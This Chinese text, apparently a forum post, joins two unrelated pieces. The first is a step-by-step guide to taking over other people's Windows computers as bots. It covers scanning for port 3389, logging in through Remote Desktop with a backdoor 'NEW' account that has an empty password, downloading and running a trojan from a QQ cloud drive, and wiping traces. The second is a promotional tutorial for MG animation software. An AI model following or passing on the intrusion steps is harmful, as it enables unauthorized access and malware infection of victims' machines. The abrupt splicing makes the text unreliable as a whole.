前些日子，我们这还可以用135抓肉鸡，现在不能用了。本来想发个贴子的，因为抓不了图，所以只好试试3389了。现在才发现，其实3389是个非常适合菜鸟抓肉鸡的工具。准备工具：端口扫描闪电1.0、windows自带的3389登陆器（远程桌面连接），QQ网络硬盘，木马一个。 1、用QQ申请QQ网络硬盘，将木马放入QQ网络硬盘。 2、用端口扫描闪电1.0在列表处填入3389，并选上，然后点点扫描。很快就有了。

3、用windows的远程桌面连接填入扫得的IP进行连接（3389登陆），最好是晚上12：00之后。如果是白天，那就要用用户名为NEW，密码为空登陆。

注意看图上的时间，我这是在下午16：00登陆的。然后用QQ登陆，从QQ网络硬盘上下载木马并运行。为什么在白天要用NEW的用户名登陆呢？这得从一个貌似安全，却后门多多的ghost xp2番茄花园版系统说起。这个系统只有一个IPC$共享，其它共享已删，可是

却能用啊D打开TELNET，然后用IPC$上传木马。并且它会在系统中产生一个名为NEW 的超级用户，以供3389登陆之用。所以在白天推荐用NEW用户登陆。 4、注意看，肉鸡上线了，从登陆到上线不过1分钟的时间。 5、最后要做好清理工作，进入肉鸡的QQ安装目录，找到你的QQ号文件夹将其删除。在回收站中也要删除。另外要注意，用3389不要去专牛角尖，遇到进入不了或进入后被T的先放弃，不要再去问怎么破密码或被T后怎么办。因为你破了密码后进去被T的可能性很大，被T后你再次进入还是会被T的，因为机子主人在使用。所以晚上12：00以后效率会高得多。我这里白天登陆纯属偶然，同时也说明了3389是可以利用的，希望你们的肉鸡多多，但不要干坏事就可以了，我一般只会找肉鸡上的杀毒软件来共享用用，或者找点病毒木马后门什么的，对盗QQ我是没兴趣的。

mg动画教程 mg动画如何制作

mg动画教程，mg动画如何制作万彩动画大师-比AE、Flash简单的MG动画视频制作软件。平时制作一些动画宣传片、类似于《飞碟说》这样MG动画的时候，大家就会想到AE、flash等专业的软件，但是无奈这些软件过于专业，要花费大量时间和精力去学，非常复杂。而有些朋友会说，用PPT也可以做啊，做完再转视频，其实更复杂，做一页动画添加几十个动画，还要花几十分钟时间去调试，这是不是可以说是自虐？这里给大家介绍一个免费的，专门制作MG动画视频制作的软件——万彩动画大师（官网：https://www.360docs.net/doc/3218981596.html,），它比AE、Flash简单得多，运行流畅，布局简洁实用，比较扁平化，符合大多数人的使用习惯。它适用于制作企业宣传动画，产品介绍短片、趣味课件视频、微课视频、多媒体课件、演示演讲动画视频、动画广告，营销动画等。

使用万彩动画大师，从新建场景－>设置背景－>编辑时间轴－>输出视频，所见所得，轻松上手；内置素材丰富，包含精美的动画模板、种类多样的各种动画角色、矢量图库、丰富的场景选择；强大的时间轴工具：支持应用不同的动画效果，调整对象进出场时间、速度及停留时间；拥有炫酷的镜头特效：可以添加旋转、缩放、平移等特效镜头，能够轻松制作出专业的MG动画。 Mg动画教程大纲：一、创建新工程文件二、新建场景、选择场景三、如何选中、编辑物体

四、添加镜头五、添加字幕六、添加背景图片七、添加动画效果八、预览、保存及发布动画视频一、mg动画教程-创建新工程文件万彩动画大师提供两种方式来创建新工程文件。 1.选择“新建空白项目”

开始编辑工程。 2.打开一个在线模板。